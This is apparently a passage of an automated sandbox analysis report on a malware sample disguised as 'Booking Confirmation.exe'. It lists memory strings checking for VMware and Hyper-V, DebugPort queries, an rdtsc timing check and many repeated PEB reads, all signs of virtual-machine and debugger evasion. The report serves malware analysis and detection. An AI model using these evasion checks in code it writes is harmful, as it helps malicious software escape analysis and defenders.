            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: k%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.689607624.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.693819137.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Booking Confirmation.exe, 00000000.00000002.671208724.0000000002798000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000006.00000002.920996195.0000000004755000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000006.00000000.693941917.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: Booking Confirmation.exe, 00000000.00000002.677064945.0000000008A0D000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareRHWAVWDPWin32_VideoControllerB9X921H9VideoController120060621000000.000000-000.9770508display.infMSBDAGST7FLCTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP78EBRXL
            Source: Booking Confirmation.exe, 00000000.00000002.671208724.0000000002798000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000006.00000000.693987799.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: k"SOFTWARE\VMware, Inc.\VMware Tools
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0040ACD0 LdrLoadDll,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018F41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01884120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018658EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01934015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01934015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01880050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01880050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01922073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01931074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01871B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01871B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0191D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01935BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01938B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01893B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01893B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01878A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01883A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01865210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018F4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0191B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0191B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01938A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018935A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_019305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_019305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01918DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01938D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018EA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01887D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01938CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_019214FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FC450 mov eax, dword ptr fs:[00000030h]
